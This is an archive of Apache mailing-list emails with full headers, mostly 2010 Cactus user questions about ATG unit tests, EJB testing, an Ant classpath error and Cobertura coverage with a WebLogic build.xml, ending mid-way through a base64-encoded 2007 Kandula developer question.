Apr 2010 16:13:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 16:13:55 +0000 X-ASF-Spam-Status: No, hits=2.9 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail2.sea5.speakeasy.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Apr 2010 16:13:48 +0000 Received: (qmail 25859 invoked from network); 19 Apr 2010 16:13:09 -0000 Received: from unknown (HELO [161.129.204.104]) (lorenzopt@[161.129.204.104]) (envelope-sender <[email protected]>) by mail2.sea5.speakeasy.net (qmail-ldap-1.03) with AES128-SHA encrypted SMTP for <[email protected]>; 19 Apr 2010 16:13:09 -0000 Subject: Re: Help running ATG unit tests Mime-Version: 1.0 (Apple Message framework v1078) Content-Type: multipart/alternative; boundary=Apple-Mail-464--818872656 From: Lorenzo Thurman <[email protected]> In-Reply-To: <[email protected]> Date: Mon, 19 Apr 2010 11:13:06 -0500 Cc: Ashish Aggarwal <[email protected]> Message-Id: <[email protected]> References: <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1078) X-Virus-Checked: Checked by ClamAV on apache.org --Apple-Mail-464--818872656 Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=us-ascii Thank you, now I'm at the next error: ClassNotFoundException for my tests. The class file in not being built. Any ideas? On Apr 19, 2010, at 11:00 AM, Ashish Aggarwal wrote: > Hi Lorenzo: >=20 > The error which you are getting = "org.apache.cactus.util.ChainedRuntimeException: Missing Cactus = property[cactus.contextURL]" is because of the missing cactus.contextURL = property value. Though I dont know much about ATG but here is how you = can setup this property in your cactified web application: >=20 > Considering that you have a test class ApplicationDaoTest (basically a = Junit class) which extends ServletTestCase, you can create a method in = this class: >=20 > public void begin(WebRequest request){ > = request.addParameter("cactus.contextURL","http://localhost:9080/CisAccount= EjbCactusTestSuite"); > } =20 >=20 > You will need to change the URL value to the appropriate value of your = application.=20 >=20 > This should get you going. >=20 > Regards > Ashish >=20 > On Mon, Apr 19, 2010 at 8:06 AM, Lorenzo Thurman = <[email protected]> wrote: > Does anyone have any experience using Cactus to run unit tests for = ATG? I found this page: > http://www.onwhichsubject.com/DynaCactus/ >=20 > But it leaves much out. At least for me, a complete novice to both = platforms. > I got Cactus installed and setup according to the instructions. I = created the sample test shown on the page and tried to run it as a junit = test, but I get this error: > org.apache.cactus.util.ChainedRuntimeException: Missing Cactus = property[cactus.contextURL] >=20 > The page suggests that you setup a special ATG module that will run my = tests, which I did. > I've created a cactus.properties file and place it in the WEB-INF = folder of the test Dynamo project module setup to run my tests. > Can someone help me out here? > Thanks >=20 > "A good friend will help you move. A really good friend will help you = move a body" > --Unknown >=20 > Lorenzo Thurman > [email protected] >=20 >=20 >=20 "Be careless in your dress if you will, but keep a tidy soul." -- Sam Clemens Lorenzo Thurman [email protected] --Apple-Mail-464--818872656-- From [email protected] Thu Apr 22 06:02:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53260 invoked from network); 22 Apr 2010 06:02:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 22 Apr 2010 06:02:46 -0000 Received: (qmail 33707 invoked by uid 500); 22 Apr 2010 06:02:46 -0000 Delivered-To: [email protected] Received: (qmail 33446 invoked by uid 500); 22 Apr 2010 06:02:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 33436 invoked by uid 99); 22 Apr 2010 06:02:41 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Apr 2010 06:02:41 +0000 X-ASF-Spam-Status: No, hits=-0.1 required=10.0 tests=AWL,FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f192.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 22 Apr 2010 06:02:35 +0000 Received: by iwn30 with SMTP id 30so5482922iwn.28 for <[email protected]>; Wed, 21 Apr 2010 23:02:14 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:from:date:received :message-id:subject:to:content-type; bh=UVTaRi49f+bHjCuCHNFDXOBFZYgDl6F4WREWuqGGeXc=; b=cSTVR79CqN0H/YaUTIg/2yn0NIDXL3uno+scIK6e0+JNqYOqoOFxqKrMHIRKf/tytf 2VQ/3k90kD4evLpBbQr6oHnpuooOQVbqRwAO3TArmgm/2+8k81RV6NAdh2pLtdHsLrPj DKkbSK0ICK8gAx2JbP6zw4qrEyGkY2hnm/0fE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:from:date:message-id:subject:to:content-type; b=Pt6WUF7AC4OpisHfaykOVoLOaxwGxJYlLl0Zz14x3nYScxtOs6GL3Lt3S3rUDNeMYc F4JEK8VpUna2i2HyiIXNo9XfweFi6l6uBQPz+ah9fduyKMCuwz1jUMxHNL9siIrVPEmg ge2p8F4+Q3O2XqFgvf3nwHUghgClSdoX2qnKQ= MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Wed, 21 Apr 2010 23:01:54 -0700 (PDT) From: Khue Vu <[email protected]> Date: Thu, 22 Apr 2010 14:01:54 +0800 Received: by 161.129.204.104 with SMTP id j3mr3212315ibw.28.1271916134097; Wed, 21 Apr 2010 23:02:14 -0700 (PDT) Message-ID: <[email protected]> Subject: Can use remote interface to test EJB with cactus? To: [email protected] Content-Type: multipart/alternative; boundary=0050450158a65b63e30484cd0df0 --0050450158a65b63e30484cd0df0 Content-Type: text/plain; charset=ISO-8859-1 Hi all I am new to cactus. Can I use the remote interface (with annotation @remote) to test EJB with cactus instead of using local interface? Is there anything wrong with that? Thanks a lot. Regards Khue. --0050450158a65b63e30484cd0df0-- From [email protected] Wed Apr 28 09:30:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19557 invoked from network); 28 Apr 2010 09:30:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Apr 2010 09:30:48 -0000 Received: (qmail 70141 invoked by uid 500); 28 Apr 2010 09:30:48 -0000 Delivered-To: [email protected] Received: (qmail 69921 invoked by uid 500); 28 Apr 2010 09:30:45 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 69905 invoked by uid 99); 28 Apr 2010 09:30:44 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Apr 2010 09:30:44 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f204.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 28 Apr 2010 09:30:36 +0000 Received: by iwn42 with SMTP id 42so9429529iwn.14 for <[email protected]>; Wed, 28 Apr 2010 02:30:13 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:mime-version:received:from:date :message-id:subject:to:content-type; bh=IR3HFeRaAvL9CYnHx7NT80FV7K2Oi+U6qFCDDLH2LXo=; b=ss3g18BCEEkr5khwdsOeq/NqlGsGG6kb/AdHg+nwYLs1d/xWhOsmqeg0fxIKM4Ylnn nTG0ICxpCheXVazmVbYKfFQU6FuUmMSTnaTlCfQIczzZi7JMm+1COcQapMGQElOd/+qf LB9v7McWmmLGIL3/4XYxeQVjBavb159OHnGrE= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:from:date:message-id:subject:to:content-type; b=scYvlP3iVepB7rVvI7k9pfHJFgKu7oDsZjMHREauCHn7A9vEVVEklfiqkaUyG62wmd pLmlOzZfB4t5E5JUjC5xcbI2JtQzOz0YsDH8VAbHZLIOUay3MboDK3kBmjazpUyHblQ/ HS6rkFvOgd9jR2eBSJn2cjg8TBIS9fI8hLzww= Received: by 161.129.204.104 with SMTP id dk16mr188509ibb.90.1272447010165; Wed, 28 Apr 2010 02:30:10 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Wed, 28 Apr 2010 02:29:50 -0700 (PDT) From: Khue Vu <[email protected]> Date: Wed, 28 Apr 2010 17:29:50 +0800 Message-ID: <[email protected]> Subject: java.lang.NoSuchMethodError: org.apache.cactus.integration.ant.CactusTask.addClasspathEntry(Ljava/lang/String) for Cactus 1.8.0 and Ant 1.7.0 To: [email protected] Content-Type: multipart/alternative; boundary=0016367d6d42095600048548a83a X-Virus-Checked: Checked by ClamAV on apache.org --0016367d6d42095600048548a83a Content-Type: text/plain; charset=ISO-8859-1 Hi all I have this error when trying to run cactus test with ant. I found bug fix regarding this issue but it is said that version 1.8 of cactus has fixed this problem? I tried putting ant-junit-1.6.5.jar into ant/lib but it doesn't work. Is this still a problem in ver 1.8.? So I gonna try the patch but I don't know how to use the patch file, can anyone help me with this?? Thank you very muhc Regards K. --0016367d6d42095600048548a83a-- From [email protected] Thu Apr 29 09:48:01 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33236 invoked from network); 29 Apr 2010 09:48:01 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 29 Apr 2010 09:48:01 -0000 Received: (qmail 14232 invoked by uid 500); 29 Apr 2010 09:48:01 -0000 Delivered-To: [email protected] Received: (qmail 14078 invoked by uid 500); 29 Apr 2010 09:47:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Cactus Users List" <cactus-user.jakarta.apache.org> Reply-To: "Cactus Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 14068 invoked by uid 99); 29 Apr 2010 09:47:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Apr 2010 09:47:57 +0000 X-ASF-Spam-Status: No, hits=1.1 required=10.0 tests=AWL,FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-iw0-f192.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 29 Apr 2010 09:47:52 +0000 Received: by iwn30 with SMTP id 30so4600742iwn.28 for <[email protected]>; Thu, 29 Apr 2010 02:47:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:mime-version:received:from:date :message-id:subject:to:content-type; bh=GanQW0VlUltwbjQMjK9NGs1WY/Kixph4ldckrfVuRQE=; b=wuIqzJcVrFZ6BDjQ1GNWg7efFKe9P2yQ/7ND/Um1XWNIVuqoputKw3IYmtyxs5zL8V Bdx+XBamTI+mcIT27nbG/x0BYnEGS9QhlLQ48ZAyyU5FZhsLElVV6Bmsl4l/5mlSUo57 kPpxtKPNylrfgB/qWPXZqkBxWYShnVgh7d/+k= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:from:date:message-id:subject:to:content-type; b=Yo47/iG2hmSDeK1vqj3HJj127aX532ZqsBqf+XkweBaOW0Aoep3gIy/C117gCBjrlm NrqaUPy4wiRVmgxtEGhlONOdnmM6QixdOtI6TltdWJsSqcBoQwmSsbfZzw53L+16xi20 PBk7VxQBiJyPh1F8aVBEjWtRXSC2mLkErEIV8= Received: by 161.129.204.104 with SMTP id o17mr295164ibx.20.1272534451350; Thu, 29 Apr 2010 02:47:31 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Thu, 29 Apr 2010 02:47:11 -0700 (PDT) From: Khue Vu <[email protected]> Date: Thu, 29 Apr 2010 17:47:11 +0800 Message-ID: <[email protected]> Subject: Using Cobertura with cactus test: To: [email protected] Content-Type: multipart/alternative; boundary=001636c5c129efeebf04855d03cd --001636c5c129efeebf04855d03cd Content-Type: text/plain; charset=ISO-8859-1 Hi all I have problem when using cobertura with cactus. I run the test and flush the result fine. Here is the output log of Weblogic Server: *Flushing results...* *Flushing results done* *Cobertura: Loaded information on 23 classes.* *Cobertura: Saved information on 23 classes.* *Flushing results...* *Flushing results done* *Cobertura: Loaded information on 23 classes.* *Cobertura: Saved information on 23 classes.* *Query is null* *Total size is 88* *First result is 0* *maxRows is 25* *result size is 25* *Flushing results...* *Flushing results done* *Cobertura: Loaded information on 23 classes.* *Cobertura: Saved information on 23 classes.* *Query is null* *Total size is 10* *First result is 0* *maxRows is 25* *result size is 10* *Flushing results...* *Flushing results done* *Cobertura: Loaded information on 23 classes.* *Cobertura: Saved information on 23 classes.* * * So the result is flushed but when the coverage report is generated, I always get 0% coverage. And according to the Cobertura FAQ, there will be cobertura.ser file in the working directory of server(WLHOME/server/bin) but I can't find it there. ( I add the code from FAQ to tearDown() methods of test cases so that server need not to shutdown to flush the result: try { String className = "net.sourceforge.cobertura.coveragedata.ProjectData"; String methodName = "saveGlobalProjectData"; Class saveClass = Class.forName(className); java.lang.reflect.Method saveMethod = saveClass.getDeclaredMethod(methodName, new Class[0]); saveMethod.invoke(null,new Object[0]); } catch (Throwable t) { } ) Any suggestion? What did I do wrong? Here is part of my build.xml file: <target name="intrument-classes-for-coverage-testing" depends="move-toplink-files-to-deployment-folder, compile-gems" > <echo message="--instrumenting classes--" /> <!-- delete the cobertura file which contain the info of instrumented classes --> <delete file="${basedir}/cobertura.ser" /> <cobertura-instrument > <fileset dir="${classes.dir}"> <include name="**" /> </fileset> </cobertura-instrument> <!-- generated cobertura.ser is at base by default --> </target> ... <target name="package-gems-ejb" depends="intrument-classes-for-coverage-testing" description="compiles and packages the gems ejb jar file"> <echo message="--- Packaging gems ejb ---"></echo> <delete file="${gems.ejb.file}"/> <jar destfile="${gems.ejb.file}"> <fileset dir="${classes.dir}"> <include name="**"/> </fileset> <fileset dir="${gems.base.dir}"> <include name="toplink\DAPS\descriptors\*.xml"/> </fileset> <metainf dir="${gems.source.dir}/META-INF"> <include name="*.xml"/> </metainf> <manifest> <attribute name="Class-Path" value="${search.jar.file.name} commons-logging.jar cobertura.jar" /> </manifest> </jar> </target> <target name="package-gems-ear-for-apps-server" description="compiles and packages the ear file, " depends="package-gems-ejb"> <echo message="${gems.ear.file}" /> <delete file="${gems.ear.file}"/> <ear destfile="${gems.ear.file}" appxml="${gems.config.dir}/META-INF/application.xml"> <fileset dir="${deployment.dir}"> <include name="${gems.ejb.file.name}"/> <include name="${search.jar.file.name}"/> </fileset> <fileset dir="${buildlib.dir}"> <include name="commons-logging.jar" /> </fileset> <fileset dir="${cobertura.dir}" > <include name="cobertura.jar" /> </fileset> <metainf dir="${gems.config.dir}/META-INF"> <include name="weblogic-application.xml"/> </metainf> </ear> </target> <target name="cactify-gems-ear-file" depends="package-war-file-for-gems-test-cases"> <echo message="--Cactifying ear file--" /> <cactifyear srcfile="${gems.ear.file}" destfile="${gems.cactified.ear.file}"> <cactuswar srcfile="${gems.cactus.test.war.file}" context="DapsWS-DataModel-context-root" /> </cactifyear> </target> <!-- deploy to gems-ear to application server --> <target name="deploy-cactified-gems-ear-to-app-server" depends="cactify-gems-ear-file"> <echo message="--Deploying to app server--" /> <wldeploy action="deploy" verbose="true" debug="true" name="GEMS" source="${gems.cactified.ear.file}" user="weblogic" password="weblogic1" adminurl="t3://localhost:7101" targets="DefaultServer" /> </target> <target name="move-cactus.properties" depends="deploy-cactified-gems-ear-to-app-server"> <echo message="Moving" /> <copy todir="${deployment.dir}/classes" > <fileset dir="${gems.base.dir}/classes"> <include name="cactus.properties" /> </fileset> </copy> </target> <target name="run-with-junit" depends="move-cactus.properties"> <junit printsummary="false" fork="yes" forkmode="once" > <sysproperty key="net.sourceforge.cobertura.datafile" file="${basedir}/cobertura.ser" /> <formatter type="brief" usefile="false" /> <formatter type="xml" /> <classpath location="${classes.dir}" /> <classpath location="${test.classes.dir}" /> <classpath refid="cactus.classpath" /> <classpath refid="buildlib" /> <classpath refid="testlib" /> <classpath refid="cobertura.classpath" /> <test name="packagename.TestClass" todir="${test.report.dir}"> </test> </junit> </target> <target name="generate-coverage-report"> <cobertura-report format="html" destdir="${coverage.report.dir}" srcdir="${gems.source.dir}" datafile="${basedir}/cobertura.ser" /> </target> Thank you very much. --001636c5c129efeebf04855d03cd--
From [email protected] Wed Aug 01 07:16:20 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44312 invoked from network); 1 Aug 2007 07:16:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Aug 2007 07:16:17 -0000 Received: (qmail 24316 invoked by uid 500); 1 Aug 2007 07:16:16 -0000 Delivered-To: [email protected] Received: (qmail 24260 invoked by uid 500); 1 Aug 2007 07:16:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 24249 invoked by uid 99); 1 Aug 2007 07:16:16 -0000 Received: from Unknown (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Aug 2007 00:16:16 -0700 X-ASF-Spam-Status: No, hits=4.4 required=10.0 tests=HTML_MESSAGE,NORMAL_HTTP_TO_IP,SPF_PASS,URIBL_RHS_DOB,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 01 Aug 2007 07:16:07 +0000 Received: by rv-out-0910.google.com with SMTP id g13so74514rvb for <[email protected]>; Wed, 01 Aug 2007 00:15:46 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:cc:mime-version:content-type; b=rpOnpz1f16ATHhZFCGMzIdOGBfvHcQGO4lNLq2y7uyaA2XC4rt1mnc7pIdcd7b10lMjP7EPwD11TKHB0NQTacIBoGDHJYZMsv0cR+RXMPJgOIbTiMhzS9qjTnAUi9fKBQq2aN5ldAjzWRqH967M7e0WNnJxltffD4tRRSZaJbpA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:cc:mime-version:content-type; b=HFkV3guTkx0YR8GSEdtbFbC7YASlKHU2QPGhUmHKXWw69qqdZh/b29Pi4CO5eofqyV7wTrDtfG4empNwr+q9u5xMI/ivB7aCmSh573DV37Gk6rTmrHZwDgmQMYQgqf6Xo/CbInUlTkwEQmfjTODZ6VyOBjma/o5UPkOLh8uenkk= Received: by 161.129.204.104 with SMTP id d2mr18658wfe.1185952546479; Wed, 01 Aug 2007 00:15:46 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 1 Aug 2007 00:15:46 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 1 Aug 2007 15:15:46 +0800 From: "=?GB2312?B?1vHOsMjE?=" <[email protected]> To: [email protected] Subject: problem about kandula Cc: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_68597_22431650.1185952546456" X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_68597_22431650.1185952546456 Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline SGVsbG86CiAgICAgIEkgbWVldCBzb21lIHByb2JsZW0gd2hlbiBJIHVzZSB0aGUga2FuZHVsYS5J biBmYWN0LEkganVzdCB3YW50IHRvIHRlc3QKdGhlIHJlZ2lzdGVyIG9wZXJhdGlvbi5CdXQgaXQg YWx3YXlzIHRocm93CmphdmEubGFuZy5OdWxsUG9pbnRlckV4Y2VwdGlvbi5UaGVuIEkgZm91bmQg dGhlIG51bGwgaW5zdGFuY2UgaXMgdGhlCkNvb3JkaW5hdG9yIGMgaW4gY2xhc3MgUmVnaXN0cmF0 aW9uSW1wbC5UaGUgcmVhc29uIGlzICAgQ29vcmRpbmF0b3IgYyA9CihDb29yZGluYXRvcilDYWxs YmFja1JlZ2lzdHJ5LmdldEluc3RhbmNlKCkuY29ycmVsYXRlTWVzc2FnZSgKQ2FsbGJhY2tSZWdp c3RyeS5DQUxMQkFDS19SRUYsIGZhbHNlKTsgZGlkbid0IGdldCB0aGUgTlVMTC5JIGRvbid0IGtu b3cKd2hlcmUgc2hvdWxkIG1lIHJlbGF0ZSBDYWxsYmFja1JlZ2lzdHJ5LkNBTExCQUNLX1JFRiB3 aXRoIHNvbWV0aGluZy5Ib3cgY2FuCkkgc29sdmUgdGhpcyBwcm9ibGVtLgotLS0tLS0tLS0tLS0t LS0tLS0tLQp0aGUgdGVzdCBzb3VyY2UgaXMgOgoKICAgZmluYWwgQ29vcmRpbmF0aW9uQ29udGV4 dCBjdHg7CiAgIGN0eCA9IG5ldyBBY3RpdmF0aW9uU3R1YihhY3RpdmF0aW9uU2VydmljZUVQUikK ICAgICAuY3JlYXRlQ29vcmRpbmF0aW9uQ29udGV4dChGQk9Db29yZGluYXRvci5DT09SRElOQVRJ T05fVFlQRSk7CiAgIC8vU3lzdGVtLm91dC5wcmludGxuKGN0eC5nZXRDb29yZGluYXRpb25UeXBl KCkpOwogICAvL1N5c3RlbS5vdXQucHJpbnRsbiggY3R4LmdldElkZW50aWZpZXIoKSk7CiAgIC8v U3lzdGVtLm91dC5wcmludGxuKGN0eC5nZXRSZWdpc3RyYXRpb25TZXJ2aWNlKCkpOwogICBFbmRw b2ludFJlZmVyZW5jZSBpbml0aWF0b3JQb3J0ID0gQ29vcmRpbmF0aW9uU2VydmljZS5nZXRJbnN0 YW5jZSgpCiAgICAgLmdldEluaXRpYXRvclNlcnZpY2UoUmVnaXN0ZUluc3RhbmNlLm5ld0luc3Rh bmNlKGN0eCksIDApOwogICBTeXN0ZW0ub3V0LnByaW50bG4oImluaXRpYXRvclBvcnQ6IiArIGlu aXRpYXRvclBvcnQudG9TdHJpbmcoKSk7CiAgIC8vIHJlbW90ZSBjb29yZGluYXRpb24gc2Vydmlj ZXMgZW5kcG9pbnQKICAgU3RyaW5nIFBST1RPQ09MX0lEX0lOSVRJQVRPUiA9CiJodHRwOi8vYmln LnR1d2llbi5hYy5hdC93cy1mYm8tLWV4dGVuc2lvbnMvcHJvdG9jb2wvaW5pdGlhdG9yCiI7CiAg IEVuZHBvaW50UmVmZXJlbmNlIGNvb3JkaW5hdG9yUG9ydCA9IGN0eC5yZWdpc3RlcigKICAgICBQ Uk9UT0NPTF9JRF9JTklUSUFUT1IsIGluaXRpYXRvclBvcnQpOwoKICAgLy8gQ2hlY2sgaWYgd2Ug Z290IHNvbWV0aGluZyBiYWNrLi4uCiAgIGlmIChjb29yZGluYXRvclBvcnQgPT0gbnVsbCkKICAg IHRocm93IG5ldyBOdWxsUG9pbnRlckV4Y2VwdGlvbigKICAgICAgIkNvb3JkaW5hdG9yUG9ydCBo YXMgbm90IGJlZW4gcHJvdmlkZWQsIGJ1dCBpcyByZXF1aXJlZCEiKTsKCgoKLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgp0aGUgcmVnaXN0cmF0aW9uQ29vcmRpbmF0b3Ig c29hcCBjb250ZW50IGlzIDoKClBPU1QgL2F4aXMvc2VydmljZXMvcmVnaXN0cmF0aW9uQ29vcmRp bmF0b3IgSFRUUC8xLjAKQ29udGVudC1UeXBlOiB0ZXh0L3htbDsgY2hhcnNldD11dGYtOApBY2Nl cHQ6IGFwcGxpY2F0aW9uL3NvYXAreG1sLCBhcHBsaWNhdGlvbi9kaW1lLCBtdWx0aXBhcnQvcmVs YXRlZCwgdGV4dC8qClVzZXItQWdlbnQ6IEF4aXMvMS40Ckhvc3Q6IDEyNy4wLjAuMTo4MjgxCkNh Y2hlLUNvbnRyb2w6IG5vLWNhY2hlClByYWdtYTogbm8tY2FjaGUKU09BUEFjdGlvbjogImh0dHA6 Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMTAvd3Njb29yL1JlZ2lzdGVyIgpDb250ZW50 LUxlbmd0aDogMTA5NQoKPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c29h cGVudjpFbnZlbG9wZSB4bWxuczpzb2FwZW52PSIKaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcv c29hcC9lbnZlbG9wZS8iIHhtbG5zOnhzZD0iCmh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2No ZW1hIgp4bWxuczp4c2k9Imh0dHA6Ly93d3cudzMub3JnLzIwMDEvWE1MU2NoZW1hLWluc3RhbmNl Ij48c29hcGVudjpCb2R5PjxSZWdpc3Rlcgo8aHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hl bWEtaW5zdGFuY2UlMjIlM0UlM0Nzb2FwZW52OkJvZHklM0UlM0NSZWdpc3Rlcj4KeG1sbnM9Imh0 dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMTAvd3Njb29yIj48UHJvdG9jb2xJZGVu dGlmaWVyPmh0dHA6Ly9iaWcudHV3aWVuLmFjLmF0L3dzLWZiby0tZXh0ZW5zaW9ucy9wcm90b2Nv bC9pbml0aWF0b3I8L1Byb3RvY29sSWRlbnRpZmllcj48UGFydGljaXBhbnRQcm90b2NvbFNlcnZp Y2U+PG5zMTpBZGRyZXNzPGh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMTAvd3Nj b29yJTIyJTNFJTNDUHJvdG9jb2xJZGVudGlmaWVyJTNFaHR0cDovL2JpZy50dXdpZW4uYWMuYXQv d3MtZmJvLS1leHRlbnNpb25zL3Byb3RvY29sL2luaXRpYXRvciUzQy9Qcm90b2NvbElkZW50aWZp ZXIlM0UlM0NQYXJ0aWNpcGFudFByb3RvY29sU2VydmljZSUzRSUzQ25zMTpBZGRyZXNzPmFic29s dXRlVVJJPSJ0cnVlIgpnZW5lcmljVVJJPSJ0cnVlIiBob3N0PSJsb2NhbGhvc3QiCnBhdGg9Ii9h eGlzL3NlcnZpY2VzL2luaXRpYXRvciIgcG9ydD0iODI4MSIgc2NoZW1lPSJodHRwIgpzY2hlbWVT cGVjaWZpY1BhcnQ9Ii8vbG9jYWxob3N0OjgyODEvYXhpcy9zZXJ2aWNlcy9pbml0aWF0b3IiCnht bG5zOm5zMT0iIGh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDQvMDgvYWRkcmVzc2lu ZyI+aHR0cDovL2xvY2FsaG9zdDo4MjgxL2F4aXMvc2VydmljZXMvaW5pdGlhdG9yPC9uczE6QWRk cmVzcz48bnMyOlJlZmVyZW5jZVByb3BlcnRpZXMKPGh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3Jn L3dzLzIwMDQvMDgvYWRkcmVzc2luZyUyMiUzRWh0dHA6Ly9sb2NhbGhvc3Q6ODI4MS9heGlzL3Nl cnZpY2VzL2luaXRpYXRvciUzQy9uczE6QWRkcmVzcyUzRSUzQ25zMjpSZWZlcmVuY2VQcm9wZXJ0 aWVzPgp4bWxuczpuczI9IgpodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2Fk ZHJlc3NpbmciPjxuczM6Q2FsbGJhY2tSZWY8aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3Mv MjAwNC8wOC9hZGRyZXNzaW5nJTIyJTNFJTNDbnMzOkNhbGxiYWNrUmVmPnhtbG5zOm5zMz0iaHR0 cDovL3dzLmFwYWNoZS5vcmcva2FuZHVsYSI+MTIzNDU2Nzg5OTYzNTIxNDc4OTwvbnMzOkNhbGxi YWNrUmVmPjwvbnMyOlJlZmVyZW5jZVByb3BlcnRpZXM+PG5zNDpSZWZlcmVuY2VQYXJhbWV0ZXJz 